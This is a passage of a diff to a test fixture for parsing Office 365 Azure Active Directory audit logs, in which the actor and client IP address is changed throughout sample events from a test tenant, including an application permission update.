testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"d37460cd-3d19-4ae9-9515-015f27036e74\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:47.4999796Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FYE60\"},{\"Name\":\"env_seqNum\",\"Value\":\"51372052\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##bbd4acc6-20b3-4cd0-8b7a-219510222555_00000000-0000-0000-0000-000000000000_bbd4acc6-20b3-4cd0-8b7a-219510222555\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"115f72b6-e8e6-4710-98e9-63ccd20bf2ec\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4423,9 +4423,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:47", "ExtendedProperties": [ { @@ -4659,7 +4659,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -4689,9 +4689,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:34:52", "ExtendedProperties": [ { @@ -4894,7 +4894,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"